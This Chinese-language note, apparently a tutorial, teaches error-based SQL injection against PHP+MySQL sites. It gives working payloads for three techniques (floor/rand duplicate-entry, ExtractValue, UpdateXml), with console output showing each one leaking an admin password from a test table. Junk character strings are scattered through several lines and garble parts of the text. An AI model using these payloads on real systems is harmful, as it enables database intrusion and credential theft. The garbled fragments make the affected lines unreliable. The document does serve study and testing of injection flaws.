放点原来的笔记。MySQL在执行语句出错的时候会抛出异常信息,而php+mysql架构的网站往往又将这些数据库错误信息直接显示在页面上,这样就可以通过构造如下三种方法,借助报错信息获取特定数据。
实际测试环境:
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1、通过floor报错
可以通过如下利用代码:

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
举例如下:
首先进行正常查询:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
. T! r& |7 R- P9 L假如id输入存在注入的话,可以通过如下语句进行报错。
" v9 x3 }1 ~/ m' ^3 b2 J5 ]4 T 4 K) i& H# U5 Y& ]2 u ~6 A( q
: j, h: R/ f; g* t8 Q1 {mysql> select * from article where id = 1 and (select 1 from( Y6 V' s/ c9 ?' C% A
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
; t; g! t$ Z) i( G, OERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'. q5 R6 v3 |' H
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。3 r5 s+ i, w7 w
例如我们需要查询管理员用户名和密码:
4 t" }' z+ ~+ a' e* ^Method1:& _8 s$ w8 H" T
% G8 y: P3 h: w: J0 {6 L& E. M
! [, }4 E* ^" n: T" _
mysql> select * from article where id = 1 and (select 1 from0 y5 K9 Q$ z% o2 }
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
7 [, D$ m- ~* U1 s. f& _! Yfrom information_schema.tables group by x)a); p1 J0 A1 f9 s# A- g
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'/ l6 i5 }- J. G8 [
Method2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2、ExtractValue
测试语句如下:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3、UpdateXml
测试语句:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
实际测试过程:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
All, thanks foreign guys.